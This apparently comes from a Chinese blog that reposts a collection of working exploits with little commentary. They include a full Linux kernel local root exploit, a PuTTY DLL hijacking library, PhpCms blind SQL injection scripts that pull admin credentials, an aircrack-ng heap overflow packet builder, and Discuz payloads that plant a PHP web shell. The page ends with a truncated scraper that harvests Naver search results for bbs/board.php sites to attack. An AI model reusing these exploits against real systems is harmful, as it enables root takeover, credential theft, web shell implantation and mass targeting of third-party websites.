Chinadu's Blog

Exploit Title: kernel-2.6.18-164 Local 2010 Exploit Root Private Cant See Images
# Date: 2010
# Author: SA H4x0r
# Version: 2.6.18-20 , 2.6.32-24 Kernel 2010 i686 And x86_64 local Private Cant See Images
# Tested on: Linux System
# Link : Cant See Links
# Greetz : All Friends And v4-Team

阅读全文...

/*

* Linux Kernel <= 2.6.37 local privilege escalation

* by Dan Rosenberg

* @djrbliss on twitter

*

* Usage:

* gcc full-nelson.c -o full-nelson

* ./full-nelson

*

* This exploit leverages three vulnerabilities to get root, all of which were

* discovered by Nelson Elhage:

*

* CVE-2010-4258

* -------------

* This is the interesting one, and the reason I wrote this exploit. If a

* thread is created via clone(2) using the CLONE_CHILD_CLEARTID flag, a NULL

* word will be written to a user-specified pointer when that thread exits.

* This write is done using put_user(), which ensures the provided destination

* resides in valid userspace by invoking access_ok(). However, Nelson

* discovered that when the kernel performs an address limit override via

* set_fs(KERNEL_DS) and the thread subsequently OOPSes (via BUG, page fault,

* etc.), this override is not reverted before calling put_user() in the exit

* path, allowing a user to write a NULL word to an arbitrary kernel address.

* Note that this issue requires an additional vulnerability to trigger.

*

* CVE-2010-3849

* -------------

* This is a NULL pointer dereference in the Econet protocol. By itself, it's

* fairly benign as a local denial-of-service. It's a perfect candidate to

* trigger the above issue, since it's reachable via sock_no_sendpage(), which

* subsequently calls sendmsg under KERNEL_DS.

*

* CVE-2010-3850

* -------------

* I wouldn't be able to reach the NULL pointer dereference and trigger the

* OOPS if users weren't able to assign Econet addresses to arbitrary

* interfaces due to a missing capabilities check.

*

* In the interest of public safety, this exploit was specifically designed to

* be limited:

*

* * The particular symbols I resolve are not exported on Slackware or Debian

* * Red Hat does not support Econet by default

* * CVE-2010-3849 and CVE-2010-3850 have both been patched by Ubuntu and

* Debian

*

* However, the important issue, CVE-2010-4258, affects everyone, and it would

* be trivial to find an unpatched DoS under KERNEL_DS and write a slightly

* more sophisticated version of this that doesn't have the roadblocks I put in

* to prevent abuse by script kiddies.

*

* Tested on unpatched Ubuntu 10.04 kernels, both x86 and x86-64.

*

* NOTE: the exploit process will deadlock and stay in a zombie state after you

* exit your root shell because the Econet thread OOPSes while holding the

* Econet mutex. It wouldn't be too hard to fix this up, but I didn't bother.

*

* Greets to spender, taviso, stealth, pipacs, jono, kees, and bla

*/

#include <stdio.h>

#include <sys/socket.h>

#include <fcntl.h>

#include <sys/ioctl.h>

#include <string.h>

#include <net/if.h>

#include <sched.h>

#include <stdlib.h>

#include <signal.h>

#include <sys/utsname.h>

#include <sys/mman.h>

#include <unistd.h>

/* How many bytes should we clear in our

* function pointer to put it into userspace? */

#ifdef __x86_64__

#define SHIFT 24

#define OFFSET 3

#else

#define SHIFT 8

#define OFFSET 1

#endif

/* thanks spender... */

unsigned long get_kernel_sym(char *name)

{

FILE *f;

unsigned long addr;

char dummy;

char sname[512];

struct utsname ver;

int ret;

int rep = 0;

int oldstyle = 0;

f = fopen("/proc/kallsyms", "r");

if (f == NULL) {

f = fopen("/proc/ksyms", "r");

if (f == NULL)

goto fallback;

oldstyle = 1;

}

repeat:

ret = 0;

while(ret != EOF) {

if (!oldstyle)

ret = fscanf(f, "%p %c %s\n", (void **)&addr, &dummy, sname);

else {

ret = fscanf(f, "%p %s\n", (void **)&addr, sname);

if (ret == 2) {

char *p;

if (strstr(sname, "_O/") || strstr(sname, "_S."))

continue;

p = strrchr(sname, '_');

if (p > ((char *)sname + 5) && !strncmp(p - 3, "smp", 3)) {

p = p - 4;

while (p > (char *)sname && *(p - 1) == '_')

p--;

*p = '\0';

}

}

}

if (ret == 0) {

fscanf(f, "%s\n", sname);

continue;

}

if (!strcmp(name, sname)) {

fprintf(stdout, " [+] Resolved %s to %p%s\n", name, (void *)addr, rep ? " (via System.map)" : "");

fclose(f);

return addr;

}

}

fclose(f);

if (rep)

return 0;

fallback:

uname(&ver);

if (strncmp(ver.release, "2.6", 3))

oldstyle = 1;

sprintf(sname, "/boot/System.map-%s", ver.release);

f = fopen(sname, "r");

if (f == NULL)

return 0;

rep = 1;

goto repeat;

}

typedef int __attribute__((regparm(3))) (* _commit_creds)(unsigned long cred);

typedef unsigned long __attribute__((regparm(3))) (* _prepare_kernel_cred)(unsigned long cred);

_commit_creds commit_creds;

_prepare_kernel_cred prepare_kernel_cred;

static int __attribute__((regparm(3)))

getroot(void * file, void * vma)

{

commit_creds(prepare_kernel_cred(0));

return -1;

}

/* Why do I do this? Because on x86-64, the address of

* commit_creds and prepare_kernel_cred are loaded relative

* to rip, which means I can't just copy the above payload

* into my landing area. */

void __attribute__((regparm(3)))

trampoline()

{

#ifdef __x86_64__

asm("mov $getroot, %rax; call *%rax;");

#else

asm("mov $getroot, %eax; call *%eax;");

#endif

}

/* Triggers a NULL pointer dereference in econet_sendmsg

* via sock_no_sendpage, so it's under KERNEL_DS */

int trigger(int * fildes)

{

int ret;

struct ifreq ifr;

memset(&ifr, 0, sizeof(ifr));

strncpy(ifr.ifr_name, "eth0", IFNAMSIZ);

ret = ioctl(fildes[2], SIOCSIFADDR, &ifr);

if(ret < 0) {

printf("[*] Failed to set Econet address.\n");

return -1;

}

splice(fildes[3], NULL, fildes[1], NULL, 128, 0);

splice(fildes[0], NULL, fildes[2], NULL, 128, 0);

/* Shouldn't get here... */

exit(0);

}

int main(int argc, char * argv[])

{

unsigned long econet_ops, econet_ioctl, target, landing;

int fildes[4], pid;

void * newstack, * payload;

/* Create file descriptors now so there are two

references to them after cloning...otherwise

the child will never return because it

deadlocks when trying to unlock various

mutexes after OOPSing */

pipe(fildes);

fildes[2] = socket(PF_ECONET, SOCK_DGRAM, 0);

fildes[3] = open("/dev/zero", O_RDONLY);

if(fildes[0] < 0 || fildes[1] < 0 || fildes[2] < 0 || fildes[3] < 0) {

printf("[*] Failed to open file descriptors.\n");

return -1;

}

/* Resolve addresses of relevant symbols */

printf("[*] Resolving kernel addresses...\n");

econet_ioctl = get_kernel_sym("econet_ioctl");

econet_ops = get_kernel_sym("econet_ops");

commit_creds = (_commit_creds) get_kernel_sym("commit_creds");

prepare_kernel_cred = (_prepare_kernel_cred) get_kernel_sym("prepare_kernel_cred");

if(!econet_ioctl || !commit_creds || !prepare_kernel_cred || !econet_ops) {

printf("[*] Failed to resolve kernel symbols.\n");

return -1;

}

if(!(newstack = malloc(65536))) {

printf("[*] Failed to allocate memory.\n");

return -1;

}

printf("[*] Calculating target...\n");

target = econet_ops + 10 * sizeof(void *) - OFFSET;

/* Clear the higher bits */

landing = econet_ioctl << SHIFT >> SHIFT;

payload = mmap((void *)(landing & ~0xfff), 2 * 4096,

PROT_READ | PROT_WRITE | PROT_EXEC,

MAP_PRIVATE | MAP_ANONYMOUS | MAP_FIXED, 0, 0);

if ((long)payload == -1) {

printf("[*] Failed to mmap() at target address.\n");

return -1;

}

memcpy((void *)landing, &trampoline, 1024);

clone((int (*)(void *))trigger,

(void *)((unsigned long)newstack + 65536),

CLONE_VM | CLONE_CHILD_CLEARTID | SIGCHLD,

&fildes, NULL, NULL, target);

sleep(1);

printf("[*] Triggering payload...\n");

ioctl(fildes[2], 0, NULL);

if(getuid()) {

printf("[*] Exploit failed to get root.\n");

return -1;

}

printf("[*] Got root!\n");

execl("/bin/sh", "/bin/sh", NULL);

}

/*

Exploit Title: PuTTY DLL Hijacking Exploit (winmm.dll)

Date: August 25, 2010

Author: storm (storm@gonullyourself.org)

Version: 0.60

Tested on: Windows Vista SP2

http://www.gonullyourself.org/

gcc -shared -o winmm.dll PuTTY-DLL.c -DWIN32_LEAN_AND_MEAN

PuTTY is a standalone program, so just plop the .dll in whatever directory the binary is in.

*/

#include <windows.h>

#define DllExport __declspec (dllexport)

DllExport void aux32Message() { hax(); }

DllExport void auxGetDevCapsA() { hax(); }

DllExport void auxGetDevCapsW() { hax(); }

DllExport void auxGetNumDevs() { hax(); }

DllExport void auxGetVolume() { hax(); }

DllExport void auxOutMessage() { hax(); }

DllExport void auxSetVolume() { hax(); }

DllExport void CloseDriver() { hax(); }

DllExport void DefDriverProc() { hax(); }

DllExport void DriverCallback() { hax(); }

DllExport void DrvGetModuleHandle() { hax(); }

DllExport void GetDriverModuleHandle() { hax(); }

DllExport void joy32Message() { hax(); }

DllExport void joyConfigChanged() { hax(); }

DllExport void joyGetDevCapsA() { hax(); }

DllExport void joyGetDevCapsW() { hax(); }

DllExport void joyGetNumDevs() { hax(); }

DllExport void joyGetPos() { hax(); }

DllExport void joyGetPosEx() { hax(); }

DllExport void joyGetThreshold() { hax(); }

DllExport void joyReleaseCapture() { hax(); }

DllExport void joySetCapture() { hax(); }

DllExport void joySetThreshold() { hax(); }

DllExport void mci32Message() { hax(); }

DllExport void mciDriverNotify() { hax(); }

DllExport void mciDriverYield() { hax(); }

DllExport void mciExecute() { hax(); }

DllExport void mciFreeCommandResource() { hax(); }

DllExport void mciGetCreatorTask() { hax(); }

DllExport void mciGetDeviceIDA() { hax(); }

DllExport void mciGetDeviceIDFromElementIDA() { hax(); }

DllExport void mciGetDeviceIDFromElementIDW() { hax(); }

DllExport void mciGetDeviceIDW() { hax(); }

DllExport void mciGetDriverData() { hax(); }

DllExport void mciGetErrorStringA() { hax(); }

DllExport void mciGetErrorStringW() { hax(); }

DllExport void mciGetYieldProc() { hax(); }

DllExport void mciLoadCommandResource() { hax(); }

DllExport void mciSendCommandA() { hax(); }

DllExport void mciSendCommandW() { hax(); }

DllExport void mciSendStringA() { hax(); }

DllExport void mciSendStringW() { hax(); }

DllExport void mciSetDriverData() { hax(); }

DllExport void mciSetYieldProc() { hax(); }

DllExport void mid32Message() { hax(); }

DllExport void midiConnect() { hax(); }

DllExport void midiDisconnect() { hax(); }

DllExport void midiInAddBuffer() { hax(); }

DllExport void midiInClose() { hax(); }

DllExport void midiInGetDevCapsA() { hax(); }

DllExport void midiInGetDevCapsW() { hax(); }

DllExport void midiInGetErrorTextA() { hax(); }

DllExport void midiInGetErrorTextW() { hax(); }

DllExport void midiInGetID() { hax(); }

DllExport void midiInGetNumDevs() { hax(); }

DllExport void midiInMessage() { hax(); }

DllExport void midiInOpen() { hax(); }

DllExport void midiInPrepareHeader() { hax(); }

DllExport void midiInReset() { hax(); }

DllExport void midiInStart() { hax(); }

DllExport void midiInStop() { hax(); }

DllExport void midiInUnprepareHeader() { hax(); }

DllExport void midiOutCacheDrumPatches() { hax(); }

DllExport void midiOutCachePatches() { hax(); }

DllExport void midiOutClose() { hax(); }

DllExport void midiOutGetDevCapsA() { hax(); }

DllExport void midiOutGetDevCapsW() { hax(); }

DllExport void midiOutGetErrorTextA() { hax(); }

DllExport void midiOutGetErrorTextW() { hax(); }

DllExport void midiOutGetID() { hax(); }

DllExport void midiOutGetNumDevs() { hax(); }

DllExport void midiOutGetVolume() { hax(); }

DllExport void midiOutLongMsg() { hax(); }

DllExport void midiOutMessage() { hax(); }

DllExport void midiOutOpen() { hax(); }

DllExport void midiOutPrepareHeader() { hax(); }

DllExport void midiOutReset() { hax(); }

DllExport void midiOutSetVolume() { hax(); }

DllExport void midiOutShortMsg() { hax(); }

DllExport void midiOutUnprepareHeader() { hax(); }

DllExport void midiStreamClose() { hax(); }

DllExport void midiStreamOpen() { hax(); }

DllExport void midiStreamOut() { hax(); }

DllExport void midiStreamPause() { hax(); }

DllExport void midiStreamPosition() { hax(); }

DllExport void midiStreamProperty() { hax(); }

DllExport void midiStreamRestart() { hax(); }

DllExport void midiStreamStop() { hax(); }

DllExport void mixerClose() { hax(); }

DllExport void mixerGetControlDetailsA() { hax(); }

DllExport void mixerGetControlDetailsW() { hax(); }

DllExport void mixerGetDevCapsA() { hax(); }

DllExport void mixerGetDevCapsW() { hax(); }

DllExport void mixerGetID() { hax(); }

DllExport void mixerGetLineControlsA() { hax(); }

DllExport void mixerGetLineControlsW() { hax(); }

DllExport void mixerGetLineInfoA() { hax(); }

DllExport void mixerGetLineInfoW() { hax(); }

DllExport void mixerGetNumDevs() { hax(); }

DllExport void mixerMessage() { hax(); }

DllExport void mixerOpen() { hax(); }

DllExport void mixerSetControlDetails() { hax(); }

DllExport void mmDrvInstall() { hax(); }

DllExport void mmGetCurrentTask() { hax(); }

DllExport void mmioAdvance() { hax(); }

DllExport void mmioAscend() { hax(); }

DllExport void mmioClose() { hax(); }

DllExport void mmioCreateChunk() { hax(); }

DllExport void mmioDescend() { hax(); }

DllExport void mmioFlush() { hax(); }

DllExport void mmioGetInfo() { hax(); }

DllExport void mmioInstallIOProcA() { hax(); }

DllExport void mmioInstallIOProcW() { hax(); }

DllExport void mmioOpenA() { hax(); }

DllExport void mmioOpenW() { hax(); }

DllExport void mmioRead() { hax(); }

DllExport void mmioRenameA() { hax(); }

DllExport void mmioRenameW() { hax(); }

DllExport void mmioSeek() { hax(); }

DllExport void mmioSendMessage() { hax(); }

DllExport void mmioSetBuffer() { hax(); }

DllExport void mmioSetInfo() { hax(); }

DllExport void mmioStringToFOURCCA() { hax(); }

DllExport void mmioStringToFOURCCW() { hax(); }

DllExport void mmioWrite() { hax(); }

DllExport void mmsystemGetVersion() { hax(); }

DllExport void mmTaskBlock() { hax(); }

DllExport void mmTaskCreate() { hax(); }

DllExport void mmTaskSignal() { hax(); }

DllExport void mmTaskYield() { hax(); }

DllExport void mod32Message() { hax(); }

DllExport void mxd32Message() { hax(); }

DllExport void NotifyCallbackData() { hax(); }

DllExport void OpenDriver() { hax(); }

DllExport void PlaySound() { hax(); }

DllExport void PlaySoundA() { hax(); }

DllExport void PlaySoundW() { hax(); }

DllExport void SendDriverMessage() { hax(); }

DllExport void sndPlaySoundA() { hax(); }

DllExport void sndPlaySoundW() { hax(); }

DllExport void tid32Message() { hax(); }

DllExport void timeBeginPeriod() { hax(); }

DllExport void timeEndPeriod() { hax(); }

DllExport void timeGetDevCaps() { hax(); }

DllExport void timeGetSystemTime() { hax(); }

DllExport void timeGetTime() { hax(); }

DllExport void timeKillEvent() { hax(); }

DllExport void timeSetEvent() { hax(); }

DllExport void waveInAddBuffer() { hax(); }

DllExport void waveInClose() { hax(); }

DllExport void waveInGetDevCapsA() { hax(); }

DllExport void waveInGetDevCapsW() { hax(); }

DllExport void waveInGetErrorTextA() { hax(); }

DllExport void waveInGetErrorTextW() { hax(); }

DllExport void waveInGetID() { hax(); }

DllExport void waveInGetNumDevs() { hax(); }

DllExport void waveInGetPosition() { hax(); }

DllExport void waveInMessage() { hax(); }

DllExport void waveInOpen() { hax(); }

DllExport void waveInPrepareHeader() { hax(); }

DllExport void waveInReset() { hax(); }

DllExport void waveInStart() { hax(); }

DllExport void waveInStop() { hax(); }

DllExport void waveInUnprepareHeader() { hax(); }

DllExport void waveOutBreakLoop() { hax(); }

DllExport void waveOutClose() { hax(); }

DllExport void waveOutGetDevCapsA() { hax(); }

DllExport void waveOutGetDevCapsW() { hax(); }

DllExport void waveOutGetErrorTextA() { hax(); }

DllExport void waveOutGetErrorTextW() { hax(); }

DllExport void waveOutGetID() { hax(); }

DllExport void waveOutGetNumDevs() { hax(); }

DllExport void waveOutGetPitch() { hax(); }

DllExport void waveOutGetPlaybackRate() { hax(); }

DllExport void waveOutGetPosition() { hax(); }

DllExport void waveOutGetVolume() { hax(); }

DllExport void waveOutMessage() { hax(); }

DllExport void waveOutOpen() { hax(); }

DllExport void waveOutPause() { hax(); }

DllExport void waveOutPrepareHeader() { hax(); }

DllExport void waveOutReset() { hax(); }

DllExport void waveOutRestart() { hax(); }

DllExport void waveOutSetPitch() { hax(); }

DllExport void waveOutSetPlaybackRate() { hax(); }

DllExport void waveOutSetVolume() { hax(); }

DllExport void waveOutUnprepareHeader() { hax(); }

DllExport void waveOutWrite() { hax(); }

DllExport void wid32Message() { hax(); }

DllExport void wod32Message() { hax(); }

DllExport void WOW32DriverCallback() { hax(); }

DllExport void WOW32ResolveMultiMediaHandle() { hax(); }

DllExport void WOWAppExit() { hax(); }

int hax()

{

WinExec("calc", 0);

exit(0);

return 0;

}

BOOL WINAPI DllMain(HINSTANCE hinstDLL,DWORD fdwReason, LPVOID lpvReserved)

{

hax();

return 0;

}

<?php

ini_set("max_execution_time",0);

error_reporting(7);

function usage()

{

global $argv;

exit(

"\n--+++============================================================+++--".

"\n--+++====== PhpCms 2008 Sp3 Blind SQL Injection Exploit========+++--".

"\n--+++============================================================+++--".

"\n\n[+] Author: My5t3ry".

"\n[+] Team: [url]http://www.t00ls.net[/url]".

"\n[+] Usage: php ".$argv[0]." <hostname> <path>".

"\n[+] Ex.: php ".$argv[0]." localhost /yp".

"\n\n");

}

function query($pos, $chr, $chs)

{

global $prefix;

switch ($chs){

case 1:

$query = "1=1 and if((ascii(substring((select username from ".$prefix."member where groupid=1 limit 0,1),{$pos},1))={$chr}),benchmark(10000000,md5(1)),1)#";

break;

case 2:

$query = "1=1 and if((ascii(substring((select password from ".$prefix."member where groupid=1 limit 0,1),{$pos},1))={$chr}),benchmark(10000000,md5(1)),1)#";

break;

case 3:

$query = "1=1 and if((length((select username from ".$prefix."member where groupid=1 limit 0,1))={$pos}),benchmark(10000000,md5(1)),1)#";

break;

}

$query = str_replace(" ", "/**/", $query);

$query = urlencode($query);

return $query;

}

function exploit($hostname, $path, $pos, $chr, $chs)

{

$chr = ord($chr);

$conn = fsockopen($hostname, 80);

$postdata = "q=&action=searchlist&where=".query($pos, $chr, $chs);

$message = "POST ".$path."/product.php HTTP/1.1\r\n";

$message .= "Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*\r\n";

$message .= "Accept-Language: zh-cn\r\n";

$message .= "Content-Type: application/x-www-form-urlencoded\r\n";

$message .= "Accept-Encoding: gzip, deflate\r\n";

$message .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)\r\n";

$message .= "Host: $hostname\r\n";

$message .= "Content-Length: ".strlen($postdata)."\r\n";

$message .= "Connection: Close\r\n\r\n";

$message .= $postdata;

//echo $message;

$time_a = time();

fputs($conn, $message);

while (!feof($conn))

$reply .= fgets($conn, 1024);

$time_b = time();

fclose($conn);

//echo $time_b - $time_a."\r\n";

if ($time_b - $time_a > 4)

return true;

else

return false;

}

function crkusername($hostname, $path, $chs)

{

global $length;

$key = "abcdefghijklmnopqrstuvwxyz0123456789";

$chr = 0;

$pos = 1;

echo "[+] username: ";

while ($pos <= $length)

{

if (exploit($hostname, $path, $pos, $key[$chr], $chs))

{

echo $key[$chr];

$chr = 0;

$pos++;

}

else

$chr++;

}

echo "\n";

}

function crkpassword($hostname, $path, $chs)

{

$key = "abcdef0123456789";

$chr = 0;

$pos = 1;

echo "[+] password: ";

while ($pos <= 32)

{

if (exploit($hostname, $path, $pos, $key[$chr], $chs))

{

echo $key[$chr];

$chr = 0;

$pos++;

}

else

$chr++;

}

echo "\n\n";

}

function lengthcolumns($hostname, $path, $chs)

{

echo "[+] username length: ";

$exit = 0;

$length = 0;

$pos = 0;

$chr = 0;

while ($exit==0)

{

if (exploit($hostname, $path, $pos, $chr, $chs))

{

$exit = 1;

$length = $pos;

}

else

$pos++;

}

echo $length."\n";

return $length;

}

function getprefix($hostname, $path)

{

echo "[+] prefix: ";

$conn = fsockopen($hostname, 80);

$request = "GET {$path}/product.php?q=&action=searchlist&where=%23 HTTP/1.1\r\n";

$request .= "Host: {$hostname}\r\n";

$request .= "Connection: Close\r\n\r\n";

fputs($conn, $request);

while (!feof($conn))

$reply .= fgets($conn, 1024);

fclose($conn);

preg_match('/FROM `(.+)yp_product/ie',$reply,$match);

if ($match[1])

return $match[1];

else

return false;

}

if ($argc != 3)

usage();

$prefix="";

$hostname = $argv[1];

$path = $argv[2];

$prefix = getprefix($hostname, $path);

if ($prefix)

{

echo $prefix."\r\n";

$length = lengthcolumns($hostname, $path, 3);

crkusername($hostname, $path, 1);

crkpassword($hostname, $path, 2);

}

else

{

exit("Exploit failed");

}

?>

<?php

ini_set("max_execution_time",0);

error_reporting(7);

function usage()

{

global $argv;

exit(

"\n--+++============================================================+++--".

"\n--+++====== PhpCms 2008 Sp3 Blind SQL Injection Exploit========+++--".

"\n--+++============================================================+++--".

"\n\n[+] Author: My5t3ry".

"\n[+] Team: [url]http://www.t00ls.net[/url]".

"\n[+] Usage: php ".$argv[0]." <hostname> <path>".

"\n[+] Ex.: php ".$argv[0]." localhost /yp".

"\n\n");

}

function query($pos, $chr, $chs)

{

global $prefix;

switch ($chs){

case 0:

$query = "#";

break;

case 1:

$query = " ascii(substring((select username from ".$prefix."member where groupid=1 limit 0,1),{$pos},1))={$chr}#";

break;

case 2:

$query = " ascii(substring((select password from ".$prefix."member where groupid=1 limit 0,1),{$pos},1))={$chr}#";

break;

case 3:

$query = " length((select username from ".$prefix."member where groupid=1 limit 0,1))={$pos}#";

break;

}

$query = str_replace(" ", "/**/", $query);

$query = urlencode($query);

return $query;

}

function exploit($hostname, $path, $pos, $chr, $chs)

{

$chr = ord($chr);

$conn = fsockopen($hostname, 80);

//print_r($conn);

/*if (!$conn){

exit("\r\n[-] No response from $conn");

}*/

$postdata = "q=&action=searchlist&where=".query($pos, $chr, $chs);

$message = "POST ".$path."/product.php HTTP/1.1\r\n";

$message .= "Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*\r\n";

$message .= "Accept-Language: zh-cn\r\n";

$message .= "Content-Type: application/x-www-form-urlencoded\r\n";

$message .= "Accept-Encoding: gzip, deflate\r\n";

$message .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)\r\n";

$message .= "Host: $hostname\r\n";

$message .= "Content-Length: ".strlen($postdata)."\r\n";

$message .= "Connection: Close\r\n\r\n";

$message .= $postdata;

//echo $message;

fputs($conn, $message);

while (!feof($conn))

$reply .= fgets($conn, 1024);

fclose($conn);

return $reply;

}

function crkusername($hostname, $path, $chs)

{

global $length;

$key = "abcdefghijklmnopqrstuvwxyz0123456789";

$chr = 0;

$pos = 1;

echo "[+] username: ";

while ($pos <= $length)

{

$response = exploit($hostname, $path, $pos, $key[$chr], $chs);

preg_match ("/<span class=\"time\">(.+)<\/span><\/strong>/i", $response, $match);

if (strlen(trim($match[1])) != 0)

{

echo $key[$chr];

$chr = 0;

$pos++;

}

else

$chr++;

}

echo "\n";

}

function crkpassword($hostname, $path, $chs)

{

$key = "abcdef0123456789";

$chr = 0;

$pos = 1;

echo "[+] password: ";

while ($pos <= 32)

{

$response = exploit($hostname, $path, $pos, $key[$chr], $chs);

preg_match ("/<span class=\"time\">(.+)<\/span><\/strong>/i", $response, $match);

if (strlen(trim($match[1])) != 0)

{

echo $key[$chr];

$chr = 0;

$pos++;

}

else

$chr++;

}

echo "\n\n";

}

function lengthcolumns($hostname, $path, $chs)

{

echo "[+] username length: ";

$exit = 0;

$length = 0;

$pos = 1;

$chr = 0;

while ($exit==0)

{

$response = exploit($hostname, $path, $pos, $chr, $chs);

preg_match ("/<span class=\"time\">(.+)<\/span><\/strong>/i", $response, $match);

if (strlen(trim($match[1])) != 0)

{

$exit = 1;

$length = $pos;

}

else

$pos++;

}

echo $length."\n";

return $length;

}

function getprefix($hostname, $path, $chs)

{

echo "[+] prefix: ";

$pos = 0;

$chr = 0;

$response = exploit($hostname, $path, $pos, $chr, $chs);

preg_match('/FROM `(.+)yp_product/ie',$response,$match);

if ($match[1])

return $match[1];

else

return false;

}

if ($argc != 3)

usage();

$prefix="";

$hostname = $argv[1];

$path = $argv[2];

$prefix = getprefix($hostname, $path, 0);

if ($prefix)

{

echo $prefix."\r\n";

$length = lengthcolumns($hostname, $path, 3);

crkusername($hostname, $path, 1);

crkpassword($hostname, $path, 2);

}

else

{

exit("\r\n[-] Exploit failed");

}

?>

#!/usr/bin/env python

# -*- coding: UTF-8 -*-

''' A remote-exploit against the aircrack-ng tools. Tested up to svn r1675.

The tools' code responsible for parsing IEEE802.11-packets assumes the

self-proclaimed length of a EAPOL-packet to be correct and never to exceed

a (arbitrary) maximum size of 256 bytes for packets that are part of the

EAPOL-authentication. We can exploit this by letting the code parse packets

which:

a) proclaim to be larger than they really are, possibly causing the code

to read from invalid memory locations while copying the packet;

b) really do exceed the maximum size allowed and overflow data structures

allocated on the heap, overwriting libc's allocation-related

structures. This causes heap-corruption.

Both problems lead either to a SIGSEGV or a SIGABRT, depending on the code-

path. Careful layout of the packet's content can even possibly alter the

instruction-flow through the already well known heap-corruption paths

in libc. Playing with the proclaimed length of the EAPOL-packet and the

size and content of the packet's padding immediately end up in various

assertion errors during calls to free(). This reveals the possibility to

gain control over $EIP.

Given that we have plenty of room for payload and that the tools are

usually executed with root-privileges, we should be able to have a

single-packet-own-everything exploit at our hands. As the attacker can

cause the various tools to do memory-allocations at his will (through

faking the appearance of previously unknown clients), the resulting

exploit-code should have a high probability of success.

The demonstration-code below requires Scapy >= 2.x and Pyrit >= 0.3.1-dev

r238 to work. It generates pcap-file with single packet of the following

content:

0801000000DEADC0DE0000DEADC0DE010000000000000000AAAA03000000888E0103FDE8FE0

108000000000000000000000000000000000000000000000000000000000000000000000000

000000000000000000000000000000000000000000000000000000000000000000000000000

000000000000000000000000000000000000043616E20492068617320736F6D65206D6F6172

3F

03/27/2010, Lukas Lueg, lukas.lueg@gmail.com

'''

import cpyrit.pckttools

import scapy.layers

# A IEEE802.11-packet with LLC- and SNAP-header, looking like the second

# phase of a EAPOL-handshake (the confirmation). The size set in the EAPOL-

# packet will cause an overflow of the "eapol"-field in struct WPA_ST_info and

# struct WPA_hdsk.

# We have plenty of room for exploit-payload as most of the fields in the

# EAPOL_Key-packet are not interpreted. As far as I can see, the adjacent

# heap structure will be overwritten by the value of EAPOL_WPAKey.Nonce in

# case of airodump-ng...

pckt = scapy.layers.dot11.Dot11(addr1='00:de:ad:c0:de:00', \

addr2='00:de:ad:c0:de:01', \

FCfield='to-DS') \

/ scapy.layers.dot11.LLC() \

/ scapy.layers.dot11.SNAP() \

/ scapy.layers.l2.EAPOL(len=65000) \

/ cpyrit.pckttools.EAPOL_Key() \

/ cpyrit.pckttools.EAPOL_WPAKey(KeyInfo = 'pairwise+mic') \

/ scapy.packet.Padding(load='Can I has some moar?')

if __name__ == '__main__':

print "Packet's content:"

print ''.join("%02X" % ord(c) for c in str(pckt))

filename = 'aircrackng_exploit.cap'

print "Writing to '%s'" % filename

writer = cpyrit.pckttools.Dot11PacketWriter(filename)

writer.write(pckt)

writer.close()

print 'Done'

1.注册一个新用户
2.Exp代码如下：

<form method="post" action=" http://www.xxx.com/bbs/misc.php" enctype="multipart/form-data">

帖子ID，指定一个存在的帖子即可：<input type="text" name="tid" value="1" />

<input type="hidden" name="action" value="imme_binding" />

<input type="hidden" name="response[result]" value="1:2" />

<input type="hidden" name="scriptlang[1][2]" value="${${eval(chr(102).chr(112).chr(117).chr(116).chr(115).chr(40).

chr(102).chr(111).chr(112).chr(101).chr(110).chr(40).chr(39).

chr(102).chr(111).chr(114).chr(117).chr(109).chr(100).

chr(97).chr(116).chr(97).chr(47).chr(99).chr(97).

chr(99).chr(104).chr(101).chr(47).chr(117).

chr(115).chr(101).chr(114).chr(103).chr(114).

chr(111).chr(117).chr(112).chr(95).chr(48).

chr(49).chr(46).chr(112).chr(104).chr(112).chr(39).

chr(44).chr(39).chr(119).chr(39).chr(41).chr(44).

chr(39).chr(60).chr(63).chr(112).chr(104).chr(112).

chr(32).chr(101).chr(118).chr(97).chr(108).chr(40).

chr(36).chr(95).chr(80).chr(79).chr(83).chr(84).

chr(91).chr(99).chr(109).chr(100).chr(93).

chr(41).chr(63).chr(62).chr(39).chr(41).chr(59))}}" />

<input type="submit" name="topicsubmit" value="提交" class="submit" />

</form>

chr解码后是：

value="${${evalfputs(fopen('forumdata/cache/usergroup','w'),'<?php eval($_POST[cmd])?>');

保存html

打开点提交，会生产forumdata/cache/usergroup_01.php一句话文件，密码是cmd

第二种方法：

直接GET，利用语句：

misc.php?action=imme_binding&response[result]=aa:b&scriptlang[aa][b]={${fputs(fopen(base64_decode(Yy5waHA),w),

base64_decode(PD9waHAgQGV2YWwoJF9QT1NUW2NdKTsgPz4x))}}

在根目录生成C.PHP密码是C

临时修补方法：

在common.inc.php上面加上

$response=$scriptlang=array();

官方发布修补补丁：

http://www.discuz.net/thread-1537673-1-1.html

利用代码如下：

< ?php
echo" +----------------------------------------------------------------+\r\n";
echo" http://www.t00ls.net\r\n";
echo" +----------------------------------------------------------------+\r\n";
for ($ii=1;$ii<=99;$ii++)
{
$c=(int)$ii*10+1;
$a="web.search.naver.com";
$b="/search.naver?where=webkr&query=bbs/board.php&xc=&docid=0&lang=all&st=s&fd=2&start=".$c."&display=10&&qvt=0&sm=tab_pge";
get($a,$b);

}

function get($host,$file)
{

$fp = fsockopen($host, 80, $errno, $errstr, 10);
if (!$fp) {
echo "SocketError: $errstr ($errno)\n";
return false;
}
$get = "GET $file HTTP/1.1\r\n";
$get .= "Host: $host\r\n";
$get .= "User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.8.1.5) Gecko/20070713 Firefox/2.0.0.5\r\n";
$get .= "Referer: http://$host\r\n";
$get .= "Connection: Close\r\n";
$get .= "Cookie: nsr_acl_nautocomplete=1; NB=GIYTSNJYHE4DKMJX; NNB=AIUHYPM7OXJUS; page_uid=fOL9uloi5UNssbPX/M8sss--100532; _naver_usersession_=SdN7qBY700kAAAKIwME\r\n\r\n";
fwrite($fp, $get);
$response=stream_get_contents($fp);
preg_match_all("(http://[-\w.]+(:\d+)?(/([\w/_.]*)?)?bbs\/board\.php)",$response,$put);
for ($i=0;$i {
$a=(int)$i*3;

fuck($put[0][$a]);
//echo count($put[0]);
//print_r($put[0]);
//fuck($put[0][$i]);

break;

}

fclose($fp);

}

function fuck($ok)
{

